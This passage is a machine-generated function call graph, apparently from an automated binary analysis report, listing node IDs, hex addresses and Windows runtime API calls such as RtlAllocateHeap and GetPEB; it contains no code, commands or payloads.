6aa8ab 37458 6aacb5 37451->37458 37453->37446 37457 6ad6fc _unexpected Concurrency::details::ThreadScheduler::Create 37454->37457 37455 6ad727 RtlAllocateHeap 37456 6ad73a __dosmaperr 37455->37456 37455->37457 37456->37451 37457->37455 37457->37456 37459 6aacc0 37458->37459 37461 6aacdb __dosmaperr 37458->37461 37460 6a7443 __dosmaperr RtlAllocateHeap 37459->37460 37459->37461 37460->37461 37461->37453 37462 677400 37463 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37462->37463 37464 677435 37463->37464 37465 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37464->37465 37466 677448 37465->37466 37467 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37466->37467 37468 677458 37467->37468 37469 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37468->37469 37470 67746d 37469->37470 37471 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37470->37471 37472 677482 37471->37472 37473 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37472->37473 37474 677494 ISource __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 37473->37474 37475 686ae0 37478 686b10 37475->37478 37476 687870 RtlAllocateHeap RtlAllocateHeap Concurrency::details::_CancellationTokenState::_RegisterCallback 37476->37478 37477 675b20 RtlAllocateHeap RtlAllocateHeap 37477->37478 37478->37476 37478->37477 37480 6846c0 37478->37480 37481 6846fb 37480->37481 37482 684df3 ISource 37480->37482 37481->37482 37484 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37481->37484 37483 684e69 ISource __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 37482->37483 37487 6a6b9a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37482->37487 37483->37478 37485 68471c 37484->37485 37486 675b20 2 API calls 37485->37486 37488 684723 37486->37488 37489 684eca 37487->37489 37490 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37488->37490 37491 684735 37490->37491 37492 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37491->37492 37493 684747 37492->37493 37494 67bd60 2 API calls 37493->37494 37495 684753 37494->37495 37496 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37495->37496 37497 684768 37496->37497 37498 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37497->37498 37499 684780 37498->37499 37500 675b20 2 API calls 37499->37500 37501 684787 37500->37501 37502 6784b0 2 API calls 37501->37502 37503 684793 37502->37503 37504 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37503->37504 37572 684a0d 37503->37572 37506 6847af 37504->37506 37505 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37507 684a3f 37505->37507 37508 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37506->37508 37509 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37507->37509 37510 6847c7 37508->37510 37511 684a54 37509->37511 37512 675b20 2 API calls 37510->37512 37513 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37511->37513 37514 6847ce 37512->37514 37515 684a66 37513->37515 37516 6784b0 2 API calls 37514->37516 37517 67bd60 2 API calls 37515->37517 37518 6847da 37516->37518 37519 684a72 37517->37519 37521 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37518->37521 37518->37572 37520 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37519->37520 37522 684a87 37520->37522 37523 6847f7 37521->37523 37524 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37522->37524 37525 675b20 2 API calls 37523->37525 37526 684a9f 37524->37526 37530 6847ff 37525->37530 37527 675b20 2 API calls 37526->37527 37528 684aa6 37527->37528 37529 6784b0 2 API calls 37528->37529 37531 684ab2 37529->37531 37532 687f30 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37530->37532 37533 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37531->37533 37536 684d80 ISource 37531->37536 37543 684869 ISource 37532->37543 37534 684ace 37533->37534 37535 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37534->37535 37537 684ae6 37535->37537 37536->37482 37538 6a6b9a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37536->37538 37540 675b20 2 API calls 37537->37540 37538->37482 37539 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37541 6848f6 37539->37541 37542 684aed 37540->37542 37544 675b20 2 API calls 37541->37544 37545 6784b0 2 API calls 37542->37545 37543->37539 37548 6848fe 37544->37548 37546 684af9 37545->37546 37546->37536 37547 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37546->37547 37549 684b16 37547->37549 37550 687f30 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37548->37550 37551 675b20 2 API calls 37549->37551 37552 684959 ISource 37550->37552 37553 684b1e 37551->37553 37552->37572 37611 679820 37552->37611 37554 684b6a 37553->37554 37555 684ea7 37553->37555 37558 687f30 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37554->37558 37623 688070 RtlAllocateHeap RtlAllocateHeap 37555->37623 37568 684b88 ISource 37558->37568 37559 6849e5 37562 6a7443 __dosmaperr RtlAllocateHeap 37559->37562 37559->37572 37560 684eac 37624 68c109 RtlAllocateHeap RtlAllocateHeap std::invalid_argument::invalid_argument Concurrency::details::ResourceManager::ResourceManager 37560->37624 37564 6849ee 37562->37564 37563 684eb6 37567 6a6b9a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37563->37567 37619 6a8979 37564->37619 37565 684bfc ISource 37566 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37565->37566 37570 684c15 37566->37570 37571 684ebb 37567->37571 37568->37563 37568->37565 37573 675b20 2 API calls 37570->37573 37574 6a6b9a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37571->37574 37572->37505 37572->37560 37575 684c1d 37573->37575 37574->37536 37576 687f30 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37575->37576 37578 684c78 ISource 37576->37578 37577 684cec ISource 37579 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37577->37579 37578->37571 37578->37577 37580 684d07 37579->37580 37581 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37580->37581 37582 684d1c 37581->37582 37583 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37582->37583 37584 684d37 37583->37584 37585 675b20 2 API calls 37584->37585 37586 684d3e 37585->37586 37587 687f30 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37586->37587 37588 684d77 37587->37588 37590 6842a0 37588->37590 37591 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37590->37591 37592 6842e2 37591->37592 37593 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37592->37593 37594 6842f4 37593->37594 37595 6784b0 2 API calls 37594->37595 37596 6842fd 37595->37596 37597 684556 37596->37597 37608 684308 ISource 37596->37608 37598 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37597->37598 37599 684567 37598->37599 37600 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37599->37600 37602 68457c 37600->37602 37601 687f30 RtlAllocateHeap RtlAllocateHeap Concurrency::details::_CancellationTokenState::_RegisterCallback 37601->37608 37603 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37602->37603 37605 68458e 37603->37605 37604 6891b0 2 API calls 37604->37608 37606 683550 5 API calls 37605->37606 37607 684520 ISource __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 37606->37607 37607->37536 37608->37601 37608->37604 37608->37607 37609 687870 RtlAllocateHeap RtlAllocateHeap Concurrency::details::_CancellationTokenState::_RegisterCallback 37608->37609 37625 683550 37608->37625 37609->37608 37612 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37611->37612 37613 67984e 37612->37613 37614 675b20 2 API calls 37613->37614 37615 679857 Concurrency::details::SchedulerBase::ThrowSchedulerEvent 37614->37615 37616 6798f6 ISource __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 37615->37616 37617 6a6b9a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37615->37617 37616->37559 37618 679922 37617->37618 37620 6a8994 37619->37620 37776 6a86d7 37620->37776 37624->37563 37626 68358f 37625->37626 37673 683d7f ISource 37625->37673 37627 687f30 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37626->37627 37628 6835c0 37627->37628 37629 684237 37628->37629 37631 687f30 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37628->37631 37771 688070 RtlAllocateHeap RtlAllocateHeap 37629->37771 37630 684212 ISource __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 37630->37608 37634 68360f 37631->37634 37633 6a6b9a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37633->37673 37634->37629 37638 687f30 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37634->37638 37635 68423c 37636 684241 37635->37636 37772 688070 RtlAllocateHeap RtlAllocateHeap 37635->37772 37639 6a6b9a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37636->37639 37641 683653 37638->37641 37640 684246 37639->37640 37642 6a6b9a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37640->37642 37641->37629 37643 683675 37641->37643 37644 68424b 37642->37644 37645 687f30 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37643->37645 37773 688070 RtlAllocateHeap RtlAllocateHeap 37644->37773 37647 683695 37645->37647 37649 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37647->37649 37648 684250 37650 6a6b9a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37648->37650 37651 6836a8 37649->37651 37652 684255 37650->37652 37653 675b20 2 API calls 37651->37653 37654 6a6b9a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37652->37654 37657 6836b3 37653->37657 37655 68425a 37654->37655 37774 68c0c9 RtlAllocateHeap RtlAllocateHeap std::invalid_argument::invalid_argument Concurrency::details::ResourceManager::ResourceManager 37655->37774 37657->37635 37658 6836ff 37657->37658 37660 687f30 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37658->37660 37659 6a6b9a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37661 684269 37659->37661 37662 683721 37660->37662 37775 68c109 RtlAllocateHeap RtlAllocateHeap std::invalid_argument::invalid_argument Concurrency::details::ResourceManager::ResourceManager 37661->37775 37662->37636 37664 683755 ISource 37662->37664 37665 679820 2 API calls 37664->37665 37666 683782 37665->37666 37667 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37666->37667 37672 683b92 ISource 37666->37672 37668 683799 37667->37668 37669 675b20 2 API calls 37668->37669 37670 6837a4 37669->37670 37671 687f30 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37670->37671 37675 6837ec ISource 37671->37675 37672->37659 37672->37673 37673->37630 37673->37633 37674 68388e ISource 37674->37644 37676 6838cd 37674->37676 37728 683a59 ISource 37674->37728 37675->37640 37675->37674 37678 687f30 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37676->37678 37677 6a7443 __dosmaperr RtlAllocateHeap 37679 683a68 37677->37679 37681 6838ea 37678->37681 37680 6a8979 4 API calls 37679->37680 37682 683a8a 37680->37682 37767 67aca0 RtlAllocateHeap ISource __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z Concurrency::details::_CancellationTokenState::_RegisterCallback 37681->37767 37682->37655 37684 683a99 37682->37684 37684->37661 37684->37672 37686 683b9d 37684->37686 37687 683ab2 37684->37687 37688 683e52 37684->37688 37689 683d84 37684->37689 37685 683987 ISource 37690 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37685->37690 37695 687f30 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37686->37695 37692 687f30 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37687->37692 37696 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37688->37696 37693 687f30 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37689->37693 37694 6839a6 37690->37694 37691 6838f5 ISource 37691->37648 37691->37685 37697 683ada 37692->37697 37698 683dac 37693->37698 37699 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37694->37699 37700 683bc5 37695->37700 37701 683e66 37696->37701 37702 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37697->37702 37703 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37698->37703 37704 6839b8 37699->37704 37705 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37700->37705 37706 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37701->37706 37707 683af8 37702->37707 37708 683dca 37703->37708 37768 674960 RtlAllocateHeap RtlAllocateHeap ISource Concurrency::details::_CancellationTokenState::_RegisterCallback 37704->37768 37710 683be3 37705->37710 37711 683e7e 37706->37711 37714 675b20 2 API calls 37707->37714 37715 675b20 2 API calls 37708->37715 37712 675b20 2 API calls 37710->37712 37713 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37711->37713 37717 683bea 37712->37717 37718 683e96 37713->37718 37719 683aff 37714->37719 37716 683dd1 37715->37716 37720 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37716->37720 37721 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37717->37721 37722 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37718->37722 37723 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37719->37723 37724 683de9 37720->37724 37726 683bff 37721->37726 37727 683ea8 37722->37727 37729 683b17 37723->37729 37730 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37724->37730 37725 6839c7 ISource 37725->37652 37725->37728 37731 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37726->37731 37770 682e20 5 API calls 6 library calls 37727->37770 37728->37677 37733 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37729->37733 37734 683e01 37730->37734 37735 683c17 37731->37735 37736 683b2f 37733->37736 37738 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37734->37738 37739 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37735->37739 37737 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37736->37737 37740 683b47 37737->37740 37741 683e19 37738->37741 37742 683c2f 37739->37742 37743 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37740->37743 37744 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37741->37744 37745 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37742->37745 37746 683b5f 37743->37746 37747 683e31 37744->37747 37748 683c47 37745->37748 37749 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37746->37749 37750 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37747->37750 37751 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37748->37751 37752 683b77 37749->37752 37750->37752 37753 683c59 37751->37753 37755 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37752->37755 37769 681dd0 5 API calls 4 library calls 37753->37769 37756 683b89 37755->37756 37758 6807f0 37756->37758 37759 687f30 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37758->37759 37760 680870 37759->37760 37761 687f30 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37760->37761 37762 68092c 37761->37762 37763 6a7443 __dosmaperr RtlAllocateHeap 37762->37763 37764 680a4b 37763->37764 37765 6a8979 4 API calls 37764->37765 37766 680a6d 37765->37766 37767->37691 37768->37725 37769->37672 37770->37672 37775->37673 37794 6a84da 37776->37794 37778 6a86e9 37779 6a8722 37778->37779 37781 6a86fe 37778->37781 37793 6a870e 37778->37793 37802 6a683a 37779->37802 37782 6a7443 __dosmaperr RtlAllocateHeap 37781->37782 37783 6a8703 37782->37783 37801 6a6b8a RtlAllocateHeap __wsopen_s 37783->37801 37786 6a872e 37787 6a875d 37786->37787 37810 6a8925 4 API calls 2 library calls 37786->37810 37790 6a87c7 37787->37790 37811 6a88fc RtlAllocateHeap __dosmaperr __wsopen_s 37787->37811 37812 6a88fc RtlAllocateHeap __dosmaperr __wsopen_s 37790->37812 37791 6a888f 37792 6a7443 __dosmaperr RtlAllocateHeap 37791->37792 37791->37793 37792->37793 37793->37572 37795 6a84df 37794->37795 37796 6a84f2 37794->37796 37797 6a7443 __dosmaperr RtlAllocateHeap 37795->37797 37796->37778 37798 6a84e4 37797->37798 37813 6a6b8a RtlAllocateHeap __wsopen_s 37798->37813 37800 6a84ef 37800->37778 37801->37793 37803 6a685a 37802->37803 37804 6a6851 37802->37804 37803->37804 37814 6aa531 3 API calls 3 library calls 37803->37814 37804->37786 37806 6a687a 37815 6ab4bb GetPEB GetPEB RtlAllocateHeap __fassign 37806->37815 37808 6a6890 37816 6ab4e8 GetPEB GetPEB RtlAllocateHeap __fassign 37808->37816 37810->37786 37811->37790 37812->37791 37813->37800 37814->37806 37815->37808 37816->37804 37841 67a348 37842 67a350 ISource 37841->37842 37843 67a86f 37842->37843 37845 67a423 ISource 37842->37845 37844 6a6b9a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37843->37844 37846 67a874 37844->37846 37847 687f30 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37845->37847 37848 6a6b9a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37846->37848 37849 67a833 37847->37849 37850 67a879 37848->37850 37851 6a6b9a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37850->37851 37852 67a87e 37851->37852 37853 6a6b9a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37852->37853 37855 67a883 37852->37855 37853->37855 37854 67a8d7 37855->37854 37858 6a6559 GetPEB GetPEB RtlAllocateHeap IsInExceptionSpec 37855->37858 37857 67a8e0 37858->37857 37859 679ad5 37860 679add ISource 37859->37860 37861 679bb0 ISource 37860->37861 37862 67a84c 37860->37862 37864 687f30 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37861->37864 37863 6a6b9a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37862->37863 37867 67a883 37862->37867 37863->37867 37865 67a833 37864->37865 37866 67a8d7 37867->37866 37870 6a6559 GetPEB GetPEB RtlAllocateHeap IsInExceptionSpec 37867->37870 37869 67a8e0 37870->37869 37895 67a5b2 37896 67a5ba ISource 37895->37896 37897 67a879 37896->37897 37898 67a68d ISource 37896->37898 37899 6a6b9a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37897->37899 37901 687f30 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37898->37901 37900 67a87e 37899->37900 37902 6a6b9a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37900->37902 37905 67a883 37900->37905 37903 67a833 37901->37903 37902->37905 37904 67a8d7 37905->37904 37908 6a6559 GetPEB GetPEB RtlAllocateHeap IsInExceptionSpec 37905->37908 37907 67a8e0 37908->37907 37909 67ea5e 37910 67ea60 37909->37910 37911 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37910->37911 37912 67ec70 37911->37912 37913 675b20 2 API calls 37912->37913 37914 67ec78 37913->37914 37915 6882f0 2 API calls 37914->37915 37916 67ec8d 37915->37916 37917 688150 2 API calls 37916->37917 37920 67ec9c 37917->37920 37918 687f30 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37918->37920 37919 67f5a9 ISource 37920->37918 37920->37919 37921 67f5db 37920->37921 37922 6a6b9a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37921->37922 37923 67f5e0 37922->37923 37924 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37923->37924 37925 67f637 37924->37925 37926 675b20 2 API calls 37925->37926 37927 67f63e 37926->37927 37928 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37927->37928 37929 67f651 37928->37929 37930 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37929->37930 37931 67f666 37930->37931 37932 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37931->37932 37933 67f67b 37932->37933 37934 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37933->37934 37935 67f68d 37934->37935 38001 67e440 RtlAllocateHeap RtlAllocateHeap ISource __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z Concurrency::details::_CancellationTokenState::_RegisterCallback 37935->38001 37937 67f696 37938 687f30 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37937->37938 37939 67f6ba 37938->37939 37940 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37939->37940 37941 67f6ca 37940->37941 37942 687f30 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37941->37942 37943 67f6e7 37942->37943 37944 687f30 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37943->37944 37946 67f700 37944->37946 37945 67f892 ISource __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 37946->37945 37947 6a6b9a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37946->37947 37948 67f8c0 37947->37948 37949 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37948->37949 37950 67f914 37949->37950 37951 675b20 2 API calls 37950->37951 37952 67f91b 37951->37952 37953 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37952->37953 37954 67f92e 37953->37954 37955 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37954->37955 37956 67f943 37955->37956 37957 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37956->37957 37958 67f958 37957->37958 37959 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37958->37959 37960 67f96a 37959->37960 38002 67e440 RtlAllocateHeap RtlAllocateHeap ISource __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z Concurrency::details::_CancellationTokenState::_RegisterCallback 37960->38002 37962 67fa45 ISource 37963 67f973 37963->37962 37964 6a6b9a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37963->37964 37965 67fa64 37964->37965 37966 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37965->37966 37967 67fab5 37966->37967 38003 6794b0 RtlAllocateHeap RtlAllocateHeap ISource __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z Concurrency::details::_CancellationTokenState::_RegisterCallback 37967->38003 37969 67fac4 38004 679160 RtlAllocateHeap RtlAllocateHeap ISource __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z Concurrency::details::_CancellationTokenState::_RegisterCallback 37969->38004 37971 67fad3 37972 688250 2 API calls 37971->37972 37973 67faeb 37972->37973 37973->37973 37974 687f30 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37973->37974 37975 67fb9c 37974->37975 37976 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37975->37976 37977 67fbb7 37976->37977 37978 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37977->37978 37979 67fbc9 37978->37979 38005 67c280 RtlAllocateHeap ISource __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z Concurrency::details::_CancellationTokenState::_RegisterCallback 37979->38005 37981 67fbd2 37982 6a6659 RtlAllocateHeap 37981->37982 37983 67fbf1 37982->37983 37984 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37983->37984 37985 6804e4 37984->37985 37986 675b20 2 API calls 37985->37986 37987 6804eb 37986->37987 37988 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37987->37988 37989 680501 37988->37989 37990 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37989->37990 37991 680519 37990->37991 37992 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37991->37992 37993 680531 37992->37993 37994 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37993->37994 37995 680543 37994->37995 38006 67e440 RtlAllocateHeap RtlAllocateHeap ISource __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z Concurrency::details::_CancellationTokenState::_RegisterCallback 37995->38006 37997 68054c 37998 680790 ISource __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 37997->37998 37999 6a6b9a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37997->37999 38000 6807e3 37999->38000 38001->37937 38002->37963 38003->37969 38004->37971 38005->37981 38006->37997 38007 6aab13 38012 6aa8e9 38007->38012 38010 6aab52 38014 6aa908 38012->38014 38013 6aa930 38019 6aaa50 38013->38019 38033 6b11eb GetPEB GetPEB RtlAllocateHeap __dosmaperr __wsopen_s 38013->38033 38014->38013 38015 6aa91b 38014->38015 38016 6a7443 __dosmaperr RtlAllocateHeap 38015->38016 38017 6aa920 38016->38017 38032 6a6b8a RtlAllocateHeap __wsopen_s 38017->38032 38020 6aa92b 38019->38020 38021 6a7443 __dosmaperr RtlAllocateHeap 38019->38021 38020->38010 38029 6b195c 38020->38029 38022 6aab01 38021->38022 38036 6a6b8a RtlAllocateHeap __wsopen_s 38022->38036 38025 6aaaa0 38025->38019 38034 6b11eb GetPEB GetPEB RtlAllocateHeap __dosmaperr __wsopen_s 38025->38034 38027 6aaabe 38027->38019 38035 6b11eb GetPEB GetPEB RtlAllocateHeap __dosmaperr __wsopen_s 38027->38035 38037 6b1321 38029->38037 38031 6b1977 38031->38010 38032->38020 38033->38025 38034->38027 38035->38019 38036->38020 38040 6b132d __FrameHandler3::FrameUnwindToState 38037->38040 38038 6b1334 38039 6a7443 __dosmaperr RtlAllocateHeap 38038->38039 38041 6b1339 38039->38041 38040->38038 38042 6b135f 38040->38042 38055 6a6b8a RtlAllocateHeap __wsopen_s 38041->38055 38046 6b18ee 38042->38046 38045 6b1343 __wsopen_s 38045->38031 38056 6a68bd 38046->38056 38048 6b1910 38059 6a681d 38048->38059 38051 6b1924 38053 6b1956 38051->38053 38054 6aacb5 __freea RtlAllocateHeap 38051->38054 38053->38045 38054->38053 38055->38045 38057 6a683a __fassign 3 API calls 38056->38057 38058 6a68cf _unexpected 38057->38058 38058->38048 38098 6a676b 38059->38098 38062 6b197c 38115 6b16ca 38062->38115 38064 6b1999 38065 6b19ae 38064->38065 38066 6b19c7 38064->38066 38133 6a7430 RtlAllocateHeap __dosmaperr 38065->38133 38129 6abd0b 38066->38129 38069 6b19cc 38070 6b19ec __wsopen_s 38069->38070 38071 6b19d5 38069->38071 38076 6b1a77 38070->38076 38077 6b1aa2 38070->38077 38134 6a7430 RtlAllocateHeap __dosmaperr 38071->38134 38073 6a7443 __dosmaperr RtlAllocateHeap 38092 6b19c0 38073->38092 38074 6b19da 38075 6a7443 __dosmaperr RtlAllocateHeap 38074->38075 38081 6b19b3 38075->38081 38135 6a740d RtlAllocateHeap __dosmaperr 38076->38135 38078 6b1aad 38077->38078 38079 6b1af4 38077->38079 38136 6a740d RtlAllocateHeap __dosmaperr 38078->38136 38137 6abc56 RtlAllocateHeap __dosmaperr __wsopen_s 38079->38137 38081->38073 38084 6b1b15 38086 6b1b61 38084->38086 38138 6b1844 4 API calls 2 library calls 38084->38138 38085 6b1abb 38085->38081 38091 6a7443 __dosmaperr RtlAllocateHeap 38085->38091 38090 6b1b68 38086->38090 38140 6b13e2 4 API calls 2 library calls 38086->38140 38089 6b1b96 38089->38090 38094 6b1ba4 __wsopen_s 38089->38094 38139 6aae08 RtlAllocateHeap __dosmaperr __wsopen_s 38090->38139 38091->38081 38092->38051 38094->38092 38141 6a740d RtlAllocateHeap __dosmaperr 38094->38141 38096 6b1c61 38142 6abe1e RtlAllocateHeap __dosmaperr __wsopen_s 38096->38142 38099 6a6779 38098->38099 38100 6a6793 38098->38100 38111 6a68fc RtlAllocateHeap __freea 38099->38111 38101 6a679a 38100->38101 38104 6a67b9 __fassign 38100->38104 38110 6a6783 38101->38110 38112 6a6916 RtlAllocateHeap RtlAllocateHeap _unexpected 38101->38112 38106 6a67cf __fassign 38104->38106 38114 6a6916 RtlAllocateHeap RtlAllocateHeap _unexpected 38104->38114 38106->38110 38113 6a740d RtlAllocateHeap __dosmaperr 38106->38113 38108 6a67db 38109 6a7443 __dosmaperr RtlAllocateHeap 38108->38109 38109->38110 38110->38051 38110->38062 38111->38110 38112->38110 38113->38108 38114->38106 38116 6b16eb 38115->38116 38117 6b1705 